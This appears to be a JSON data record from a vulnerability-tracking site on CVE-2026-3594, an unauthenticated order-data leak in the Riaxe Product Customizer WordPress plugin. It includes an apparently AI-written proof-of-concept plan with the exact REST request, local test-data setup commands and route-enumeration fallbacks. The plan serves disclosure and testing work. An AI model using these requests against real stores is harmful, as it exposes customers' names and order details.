[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fvA76plcrdneBkpAO3ADfZW8LvVgV7-1e-QNtNC6OXsQ":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":24,"research_started_at":25,"research_completed_at":26,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"source_links":27},"CVE-2026-3594","riaxe-product-customizer-unauthenticated-sensitive-information-disclosure-via-orders-rest-api-endpoint","Riaxe Product Customizer \u003C= 2.4 - Unauthenticated Sensitive Information Disclosure via '\u002Forders' REST API Endpoint","The Riaxe Product Customizer plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.4 via the '\u002Fwp-json\u002FInkXEProductDesignerLite\u002Forders' REST API endpoint. The endpoint is registered with 'permission_callback' set to '__return_true', meaning no authentication or authorization checks are performed. The endpoint queries WooCommerce order data from the database and returns it to the requester, including customer first and last names, customer IDs, order IDs, order totals, order dates, currencies, and order statuses. This makes it possible for unauthenticated attackers to extract sensitive customer and order information from the WooCommerce store.","riaxe-product-customizer",null,"\u003C=2.4","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:L\u002FI:N\u002FA:N","Exposure of Sensitive Information to an Unauthorized Actor","2026-04-07 17:37:29","2026-04-08 06:43:38",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F2ffd6393-6604-48d9-ba22-7d989305e9ed?source=api-prod",[],"researched",false,3,"This research plan outlines the technical steps required to demonstrate the unauthenticated sensitive information disclosure vulnerability in the **Riaxe Product Customizer** plugin.\n\n### 1. Vulnerability Summary\nThe Riaxe Product Customizer plugin (\u003C= 2.4) registers a custom WordPress REST API endpoint `\u002Fwp-json\u002FInkXEProductDesignerLite\u002Forders` intended to retrieve order data. However, the `permission_callback` for this route is set to `__return_true`, which bypasses WordPress's built-in authentication and authorization mechanisms. Consequently, any unauthenticated user can query the endpoint to retrieve sensitive WooCommerce order details, including customer names, IDs, order totals, and statuses.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-json\u002FInkXEProductDesignerLite\u002Forders`\n*   **HTTP Method:** `GET` (inferred)\n*   **Authentication:** None required (`permission_callback` is `__return_true`).\n*   **Payload:** No specific payload required; a simple GET request triggers the data leak.\n*   **Preconditions:** \n    1.  The plugin \"Riaxe Product Customizer\" must be active.\n    2.  WooCommerce must be installed and have existing order data for the exposure to be impactful.\n\n### 3. Code Flow (Inferred)\n1.  **Hook Registration:** The plugin likely uses the `rest_api_init` hook to register its API routes.\n2.  **Route Definition:** Inside the registration function, `register_rest_route` is called:\n    ```php\n    register_rest_route('InkXEProductDesignerLite', '\u002Forders', array(\n        'methods'             => 'GET', \u002F\u002F or WP_REST_Server::READABLE\n        'callback'            => array($this, 'get_all_orders'), \u002F\u002F (inferred callback name)\n        'permission_callback' => '__return_true', \u002F\u002F THE VULNERABILITY\n    ));\n    ```\n3.  **Data Retrieval:** The callback function queries the WooCommerce orders (likely using `wc_get_orders` or a direct global `$wpdb` query on `wp_posts` and `wp_postmeta`).\n4.  **Data Output:** The function returns a `WP_REST_Response` containing an array of order objects, which WordPress serializes into JSON.\n\n### 4. Nonce Acquisition Strategy\nAccording to the vulnerability description, the `permission_callback` is set to `__return_true`. In the WordPress REST API, when a route is configured this way, **no X-WP-Nonce header or cookie-based authentication is required** to access the endpoint.\n\nIf the environment configuration or a security plugin later enforced a global REST nonce requirement, the nonce for the `wp_rest` action would be needed. However, for a standard PoC of this specific vulnerability, **no nonce is expected to be necessary.**\n\n### 5. Exploitation Strategy\nThe exploitation involves a direct request to the exposed REST endpoint.\n\n*   **Step 1:** Verify the endpoint exists and is reachable.\n*   **Step 2:** Send a GET request to the target.\n*   **Step 3:** Parse the JSON response to confirm the presence of customer names and order totals.\n\n**HTTP Request (via `http_request` tool):**\n```http\nGET \u002Fwp-json\u002FInkXEProductDesignerLite\u002Forders HTTP\u002F1.1\nHost: localhost:8080\nAccept: application\u002Fjson\n```\n\n### 6. Test Data Setup\nTo verify the disclosure, mock data must exist in the WooCommerce system.\n\n1.  **Install\u002FActivate Riaxe Product Customizer:** Ensure version \u003C= 2.4 is installed.\n2.  **Install\u002FActivate WooCommerce:** The plugin depends on WooCommerce data.\n3.  **Create a Customer User:**\n    ```bash\n    wp user create victim_customer victim@example.com --role=customer --user_pass=password123\n    ```\n4.  **Create Mock Orders:** Use WP-CLI to generate an order (requires WooCommerce CLI support or manual DB insertion).\n    ```bash\n    # Alternative: Use a PHP script via wp eval to create an order\n    wp eval '\n    $order = wc_create_order();\n    $order->set_billing_first_name(\"John\");\n    $order->set_billing_last_name(\"Doe\");\n    $order->set_total(99.99);\n    $order->set_status(\"completed\");\n    $order->save();\n    '\n    ```\n\n### 7. Expected Results\nA successful exploit will return a `200 OK` status and a JSON body containing an array of order objects.\n\n**Example Response Body:**\n```json\n[\n  {\n    \"order_id\": 123,\n    \"customer_id\": 5,\n    \"first_name\": \"John\",\n    \"last_name\": \"Doe\",\n    \"order_total\": \"99.99\",\n    \"order_date\": \"2023-10-27 10:00:00\",\n    \"currency\": \"USD\",\n    \"status\": \"completed\"\n  }\n]\n```\n\n### 8. Verification Steps\n1.  **Identify Order in Database:**\n    ```bash\n    wp db query \"SELECT ID, post_status FROM wp_posts WHERE post_type='shop_order' LIMIT 1;\"\n    ```\n2.  **Compare API Output:** Match the `order_id` and `order_total` from the HTTP response with the data returned by the CLI command:\n    ```bash\n    wp post get \u003CID> --field=post_title\n    # and\n    wp post meta get \u003CID> _order_total\n    ```\n3.  **Check Sensitivity:** Confirm that the `first_name` and `last_name` returned by the API match the billing information of the user associated with that order.\n\n### 9. Alternative Approaches\nIf the `\u002Forders` endpoint is not found, it is possible the namespace or route suffix varies slightly between minor versions. \n\n1.  **Enumerate Routes:** Request the main REST index to discover the exact path:\n    ```bash\n    GET \u002Fwp-json\u002F\n    ```\n    Then search the response for \"InkXE\".\n2.  **Check for POST:** If `GET` returns a 405 Method Not Allowed, try a `POST` request with an empty body:\n    ```bash\n    POST \u002Fwp-json\u002FInkXEProductDesignerLite\u002Forders HTTP\u002F1.1\n    Content-Length: 0\n    ```\n3.  **Examine Sub-directories:** If the plugin follows a different naming convention, grep the source code for `register_rest_route` to find the exact string:\n    ```bash\n    grep -rn \"register_rest_route\" wp-content\u002Fplugins\u002Friaxe-product-customizer\u002F\n    ```","gemini-3-flash-preview","2026-04-17 20:38:10","2026-04-17 20:38:26",{"type":28,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":29},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Friaxe-product-customizer\u002Ftags"]